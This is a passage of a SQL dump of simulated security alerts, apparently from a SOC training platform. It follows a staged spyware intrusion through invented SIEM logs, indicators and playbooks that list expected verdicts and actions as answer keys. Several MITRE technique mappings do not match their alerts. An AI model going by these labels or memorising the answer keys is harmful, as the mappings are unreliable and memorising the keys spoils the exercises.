Module\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.347Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. 
[Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:34Z\\\",\\\"device_id\\\":\\\"MD-12457\\\",\\\"user\\\":\\\"johndoe\\\",\\\"source_ip\\\":\\\"10.0.1.23\\\",\\\"external_ip\\\":\\\"185.199.108.153\\\",\\\"malware_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"invoice.pdf\\\",\\\"status\\\":\\\"executed\\\",\\\"mdm_agent\\\":\\\"v5.4.1\\\",\\\"event\\\":\\\"malware_execution\\\",\\\"description\\\":\\\"Spyware executed upon opening attachment\\\",\\\"detected_by\\\":\\\"MDM Security Module\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.347Z\",\"source\":\"/var/ossec/logs/alerts/alerts.json\",\"event_code\":\"Rule: 1002\",\"message\":\"File integrity changed for /etc/passwd. Checksum mismatch. [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T14:22:34Z\\\",\\\"device_id\\\":\\\"MD-12457\\\",\\\"user\\\":\\\"johndoe\\\",\\\"source_ip\\\":\\\"10.0.1.23\\\",\\\"external_ip\\\":\\\"185.199.108.153\\\",\\\"malware_hash\\\":\\\"5d41402abc4b2a76b9719d911017c592\\\",\\\"filename\\\":\\\"invoice.pdf\\\",\\\"status\\\":\\\"executed\\\",\\\"mdm_agent\\\":\\\"v5.4.1\\\",\\\"event\\\":\\\"malware_execution\\\",\\\"description\\\":\\\"Spyware executed upon opening attachment\\\",\\\"detected_by\\\":\\\"MDM Security Module\\\"}\"}],\"query\":\"index=main source=\\\"/var/ossec/logs/alerts/alerts.json\\\" | head 100\"}}', 0);
INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`, `created_by`, `organization_id`, `simulation_data`, `is_archived`) VALUES
(1523, 'Establishing Persistence on Mobile', 'high', 'Mobile Application Logs', 'The spyware modifies system settings to ensure it remains active even after device reboots, securing a foothold in the device.', 'Persistence', 'T1547.014', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T08:42:21Z\",\"device_id\":\"mobile-192.168.1.15\",\"user\":\"john_doe\",\"description\":\"Suspicious modification of system files detected\",\"event\":{\"type\":\"execution\",\"process\":{\"name\":\"com.android.spyware\",\"pid\":2345,\"path\":\"/system/bin/persistent_service\"},\"modification\":{\"file\":\"/system/bin/boot.sh\",\"action\":\"modified\",\"hash\":\"5f4dcc3b5aa765d61d8327deb882cf99\"}},\"source_ip\":\"198.51.100.23\",\"internal_ip\":\"192.168.1.15\"}', '2026-03-15 19:10:20', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat_intel\",\"verdict\":\"malicious\",\"details\":\"Known C2 server associated with mobile spyware campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"5f4dcc3b5aa765d61d8327deb882cf99\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware_analysis\",\"verdict\":\"malicious\",\"details\":\"Hash associated with a persistent mobile spyware sample.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"/system/bin/boot.sh\",\"is_critical\":false,\"osint_result\":{\"source\":\"system_logs\",\"verdict\":\"suspicious\",\"details\":\"File modification detected related to persistence methods.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.354Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T08:42:21Z\\\",\\\"device_id\\\":\\\"mobile-192.168.1.15\\\",\\\"user\\\":\\\"john_doe\\\",\\\"description\\\":\\\"Suspicious modification of system files detected\\\",\\\"event\\\":{\\\"type\\\":\\\"execution\\\",\\\"process\\\":{\\\"name\\\":\\\"com.android.spyware\\\",\\\"pid\\\":2345,\\\"path\\\":\\\"/system/bin/persistent_service\\\"},\\\"modification\\\":{\\\"file\\\":\\\"/system/bin/boot.sh\\\",\\\"action\\\":\\\"modified\\\",\\\"hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\"}},\\\"source_ip\\\":\\\"198.51.100.23\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.354Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T08:42:21Z\\\",\\\"device_id\\\":\\\"mobile-192.168.1.15\\\",\\\"user\\\":\\\"john_doe\\\",\\\"description\\\":\\\"Suspicious modification of system files detected\\\",\\\"event\\\":{\\\"type\\\":\\\"execution\\\",\\\"process\\\":{\\\"name\\\":\\\"com.android.spyware\\\",\\\"pid\\\":2345,\\\"path\\\":\\\"/system/bin/persistent_service\\\"},\\\"modification\\\":{\\\"file\\\":\\\"/system/bin/boot.sh\\\",\\\"action\\\":\\\"modified\\\",\\\"hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\"}},\\\"source_ip\\\":\\\"198.51.100.23\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.354Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T08:42:21Z\\\",\\\"device_id\\\":\\\"mobile-192.168.1.15\\\",\\\"user\\\":\\\"john_doe\\\",\\\"description\\\":\\\"Suspicious modification of system files detected\\\",\\\"event\\\":{\\\"type\\\":\\\"execution\\\",\\\"process\\\":{\\\"name\\\":\\\"com.android.spyware\\\",\\\"pid\\\":2345,\\\"path\\\":\\\"/system/bin/persistent_service\\\"},\\\"modification\\\":{\\\"file\\\":\\\"/system/bin/boot.sh\\\",\\\"action\\\":\\\"modified\\\",\\\"hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\"}},\\\"source_ip\\\":\\\"198.51.100.23\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.354Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T08:42:21Z\\\",\\\"device_id\\\":\\\"mobile-192.168.1.15\\\",\\\"user\\\":\\\"john_doe\\\",\\\"description\\\":\\\"Suspicious modification of system files detected\\\",\\\"event\\\":{\\\"type\\\":\\\"execution\\\",\\\"process\\\":{\\\"name\\\":\\\"com.android.spyware\\\",\\\"pid\\\":2345,\\\"path\\\":\\\"/system/bin/persistent_service\\\"},\\\"modification\\\":{\\\"file\\\":\\\"/system/bin/boot.sh\\\",\\\"action\\\":\\\"modified\\\",\\\"hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\"}},\\\"source_ip\\\":\\\"198.51.100.23\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.354Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-15T08:42:21Z\\\",\\\"device_id\\\":\\\"mobile-192.168.1.15\\\",\\\"user\\\":\\\"john_doe\\\",\\\"description\\\":\\\"Suspicious modification of system files 
detected\\\",\\\"event\\\":{\\\"type\\\":\\\"execution\\\",\\\"process\\\":{\\\"name\\\":\\\"com.android.spyware\\\",\\\"pid\\\":2345,\\\"path\\\":\\\"/system/bin/persistent_service\\\"},\\\"modification\\\":{\\\"file\\\":\\\"/system/bin/boot.sh\\\",\\\"action\\\":\\\"modified\\\",\\\"hash\\\":\\\"5f4dcc3b5aa765d61d8327deb882cf99\\\"}},\\\"source_ip\\\":\\\"198.51.100.23\\\",\\\"internal_ip\\\":\\\"192.168.1.15\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1524, 'Credential Harvesting Detected', 'high', 'Network Traffic Analysis', 'The spyware has initiated credential harvesting, capturing sensitive credentials for lateral movement within the network. This is a critical step in the operation that facilitates credential theft.', 'Credential Access', 'T1110: Brute Force', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T08:45:37Z\",\"source_ip\":\"185.92.220.45\",\"destination_ip\":\"192.168.1.25\",\"protocol\":\"HTTPS\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"observed_filenames\":[\"harvest.exe\"],\"malware_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"username\":\"jdoe\",\"event_type\":\"credential_harvest\",\"action\":\"login_attempt\",\"status\":\"successful\"}', '2026-03-15 19:10:20', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.92.220.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"ThreatIntelDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with previously known credential harvesting campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"InternalNetwork\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash of known spyware used in credential harvesting.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"harvest.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"MalwareAnalysisLab\",\"verdict\":\"malicious\",\"details\":\"Executable associated with credential harvesting malware.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"InternalDirectory\",\"verdict\":\"internal\",\"details\":\"User account targeted for 
credential theft.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1525, 'Attempted Lateral Movement to Corporate Network', 'high', 'Network Intrusion Detection System', 'The attackers, with stolen credentials, attempted to access the corporate network from a compromised mobile device. This step indicates a sophisticated lateral movement attempt, aiming to escalate their access to sensitive corporate data.', 'Lateral Movement', 'T1570: Lateral Tool Transfer', 1, 'new', NULL, '{\"timestamp\":\"2023-10-11T14:22:35Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.15\",\"username\":\"jdoe\",\"filename\":\"malware_payload.exe\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"event_type\":\"lateral_movement_attempt\",\"details\":\"Unauthorized lateral movement attempt detected from external IP using compromised credentials.\"}', '2026-03-15 19:10:20', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP involved in previous attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal corporate network IP\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Company Directory\",\"verdict\":\"suspicious\",\"details\":\"Credentials possibly compromised\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"malware_payload.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Antivirus Database\",\"verdict\":\"malicious\",\"details\":\"File associated with known malware\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Hash Registry\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware 
sample\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1526, 'Data Exfiltration Initiated', 'high', 'Data Loss Prevention Logs', 'Having infiltrated the network, the attackers begin exfiltrating data, focusing on personal and proprietary information. The attackers use multiple techniques to evade detection while transferring data to an external server.', 'Exfiltration', 'T1048: Exfiltration Over Alternative Protocol', 1, 'new', NULL, '{\"timestamp\":\"2023-10-09T14:23:07Z\",\"event_type\":\"data_exfiltration\",\"internal_ip\":\"10.0.15.21\",\"external_ip\":\"203.0.113.45\",\"user\":\"jane.doe\",\"filename\":\"confidential_project_plan.docx\",\"file_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"protocol\":\"HTTPS\",\"destination_domain\":\"malicious-download.com\",\"bytes_transferred\":5242880,\"alert_trigger\":\"Data exfiltration threshold exceeded\"}', '2026-03-15 19:10:20', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.15.21\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"osint database\",\"verdict\":\"malicious\",\"details\":\"IP address associated with known exfiltration activity\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jane.doe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"User account possibly compromised\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"confidential_project_plan.docx\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"suspicious\",\"details\":\"Sensitive document being exfiltrated\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"hash database\",\"verdict\":\"clean\",\"details\":\"Common hash, potentially altered 
file\"}},{\"id\":\"artifact_6\",\"type\":\"domain\",\"value\":\"malicious-download.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat intelligence\",\"verdict\":\"malicious\",\"details\":\"Domain involved in known malicious activities\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.367Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-09T14:23:07Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"internal_ip\\\":\\\"10.0.15.21\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jane.doe\\\",\\\"filename\\\":\\\"confidential_project_plan.docx\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"destination_domain\\\":\\\"malicious-download.com\\\",\\\"bytes_transferred\\\":5242880,\\\"alert_trigger\\\":\\\"Data exfiltration threshold exceeded\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.367Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-09T14:23:07Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"internal_ip\\\":\\\"10.0.15.21\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jane.doe\\\",\\\"filename\\\":\\\"confidential_project_plan.docx\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"destination_domain\\\":\\\"malicious-download.com\\\",\\\"bytes_transferred\\\":5242880,\\\"alert_trigger\\\":\\\"Data exfiltration 
threshold exceeded\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.367Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-09T14:23:07Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"internal_ip\\\":\\\"10.0.15.21\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jane.doe\\\",\\\"filename\\\":\\\"confidential_project_plan.docx\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"destination_domain\\\":\\\"malicious-download.com\\\",\\\"bytes_transferred\\\":5242880,\\\"alert_trigger\\\":\\\"Data exfiltration threshold exceeded\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.367Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-09T14:23:07Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"internal_ip\\\":\\\"10.0.15.21\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jane.doe\\\",\\\"filename\\\":\\\"confidential_project_plan.docx\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"destination_domain\\\":\\\"malicious-download.com\\\",\\\"bytes_transferred\\\":5242880,\\\"alert_trigger\\\":\\\"Data exfiltration threshold exceeded\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.367Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-09T14:23:07Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"internal_ip\\\":\\\"10.0.15.21\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"user\\\":\\\"jane.doe\\\",\\\"filename\\\":\\\"confidential_project_plan.docx\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"destination_domain\\\":\\\"malicious-download.com\\\",\\\"bytes_transferred\\\":5242880,\\\"alert_trigger\\\":\\\"Data exfiltration threshold exceeded\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1527, 'Evidence of Human Rights Violation Gathered', 'critical', 'Human Rights Watch Reports', 'The final analysis reveals broader implications of the spyware, emphasizing the erosion of privacy and its impact on human rights defenders. This operation has uncovered significant evidence of human rights violations facilitated through the use of spyware.', 'Impact', 'T1059.001 - Command and Scripting Interpreter: PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-21T14:32:00Z\",\"event_id\":\"HRW-2023-1059\",\"user\":\"john.doe@organization.org\",\"internal_ip\":\"192.168.4.23\",\"external_ip\":\"203.0.113.45\",\"malware_hash\":\"e99a18c428cb38d5f260853678922e03\",\"filename\":\"spyware_report.docx\",\"action\":\"Data Exfiltration\",\"description\":\"The spyware was used to gather sensitive information on human rights activities, compromising the privacy of involved individuals.\",\"indicators\":[{\"type\":\"ip\",\"value\":\"203.0.113.45\",\"description\":\"External command and control server associated with attack\"},{\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"description\":\"Malware sample used in the operation\"},{\"type\":\"filename\",\"value\":\"spyware_report.docx\",\"description\":\"File containing exfiltrated data\"},{\"type\":\"username\",\"value\":\"john.doe@organization.org\",\"description\":\"Compromised user account\"}]}', '2026-03-15 19:10:20', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known C&C server used in multiple APT campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a known spyware 
sample\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"spyware_report.docx\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"suspicious\",\"details\":\"File contains exfiltrated sensitive information\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"john.doe@organization.org\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"User account compromised during the incident\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'expert', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.371Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:32:00Z\\\",\\\"event_id\\\":\\\"HRW-2023-1059\\\",\\\"user\\\":\\\"john.doe@organization.org\\\",\\\"internal_ip\\\":\\\"192.168.4.23\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"filename\\\":\\\"spyware_report.docx\\\",\\\"action\\\":\\\"Data Exfiltration\\\",\\\"description\\\":\\\"The spyware was used to gather sensitive information on human rights activities, compromising the privacy of involved individuals.\\\",\\\"indicators\\\":[{\\\"type\\\":\\\"ip\\\",\\\"value\\\":\\\"203.0.113.45\\\",\\\"description\\\":\\\"External command and control server associated with attack\\\"},{\\\"type\\\":\\\"hash\\\",\\\"value\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"description\\\":\\\"Malware sample used in the 
operation\\\"},{\\\"type\\\":\\\"filename\\\",\\\"value\\\":\\\"spyware_report.docx\\\",\\\"description\\\":\\\"File containing exfiltrated data\\\"},{\\\"type\\\":\\\"username\\\",\\\"value\\\":\\\"john.doe@organization.org\\\",\\\"description\\\":\\\"Compromised user account\\\"}]}\"},{\"timestamp\":\"2026-03-15T20:57:15.371Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:32:00Z\\\",\\\"event_id\\\":\\\"HRW-2023-1059\\\",\\\"user\\\":\\\"john.doe@organization.org\\\",\\\"internal_ip\\\":\\\"192.168.4.23\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"filename\\\":\\\"spyware_report.docx\\\",\\\"action\\\":\\\"Data Exfiltration\\\",\\\"description\\\":\\\"The spyware was used to gather sensitive information on human rights activities, compromising the privacy of involved individuals.\\\",\\\"indicators\\\":[{\\\"type\\\":\\\"ip\\\",\\\"value\\\":\\\"203.0.113.45\\\",\\\"description\\\":\\\"External command and control server associated with attack\\\"},{\\\"type\\\":\\\"hash\\\",\\\"value\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"description\\\":\\\"Malware sample used in the operation\\\"},{\\\"type\\\":\\\"filename\\\",\\\"value\\\":\\\"spyware_report.docx\\\",\\\"description\\\":\\\"File containing exfiltrated data\\\"},{\\\"type\\\":\\\"username\\\",\\\"value\\\":\\\"john.doe@organization.org\\\",\\\"description\\\":\\\"Compromised user account\\\"}]}\"},{\"timestamp\":\"2026-03-15T20:56:15.371Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:32:00Z\\\",\\\"event_id\\\":\\\"HRW-2023-1059\\\",\\\"user\\\":\\\"john.doe@organization.org\\\",\\\"internal_ip\\\":\\\"192.168.4.23\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"filename\\\":\\\"spyware_report.docx\\\",\\\"action\\\":\\\"Data Exfiltration\\\",\\\"description\\\":\\\"The spyware was used to gather sensitive information on human rights activities, compromising the privacy of involved individuals.\\\",\\\"indicators\\\":[{\\\"type\\\":\\\"ip\\\",\\\"value\\\":\\\"203.0.113.45\\\",\\\"description\\\":\\\"External command and control server associated with attack\\\"},{\\\"type\\\":\\\"hash\\\",\\\"value\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"description\\\":\\\"Malware sample used in the operation\\\"},{\\\"type\\\":\\\"filename\\\",\\\"value\\\":\\\"spyware_report.docx\\\",\\\"description\\\":\\\"File containing exfiltrated data\\\"},{\\\"type\\\":\\\"username\\\",\\\"value\\\":\\\"john.doe@organization.org\\\",\\\"description\\\":\\\"Compromised user account\\\"}]}\"},{\"timestamp\":\"2026-03-15T20:55:15.371Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-21T14:32:00Z\\\",\\\"event_id\\\":\\\"HRW-2023-1059\\\",\\\"user\\\":\\\"john.doe@organization.org\\\",\\\"internal_ip\\\":\\\"192.168.4.23\\\",\\\"external_ip\\\":\\\"203.0.113.45\\\",\\\"malware_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"filename\\\":\\\"spyware_report.docx\\\",\\\"action\\\":\\\"Data Exfiltration\\\",\\\"description\\\":\\\"The spyware was used to gather sensitive information on human rights activities, compromising the privacy of involved 